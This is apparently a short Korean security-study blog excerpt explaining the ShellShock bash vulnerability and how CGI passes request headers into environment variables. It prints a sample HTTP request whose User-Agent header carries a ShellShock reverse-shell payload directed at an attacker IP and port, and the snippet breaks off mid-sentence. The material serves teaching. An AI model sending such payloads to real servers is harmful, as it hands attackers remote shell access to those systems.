Shell Shock1 [Day 121] GNU Bash 취약점(ShellShock) 개요 취약한 버전의 bash는 환경변수의 함수 선언문 뒤에 임의의 명령어를 삽입할 경우, 환경변수에 설정된 함수 선언 시 함수 선언의 끝을 인지하지 못하고 삽입한 명령어까지 실행하는 취약점이 있음. 이것을 GNU Bash 또는 ShellShock 취약점이라고 함 CGI를 이용한 Bash 취약점 공격유형 공격원리 CGI는 User-Agent 같은 요청 헤더정보를 쉘의 환경변수에 저장함. 공격자가 헤더정보에 함수와 명령어를 추가하여 전송하면 해당 명령어가 실행되는 취약점 발생 리버스 쉘 연결 유형 GET /cgi-bin/bash_vul.cgi HTTP1.1 User-Agent:(){ :; };/bin/bash > /dev/tcp/10.10.10,10 8081 0) 하고 있음. 즉 bash를 통해 화면으로 출.. 2020. 12. 9. 이전 1 다음
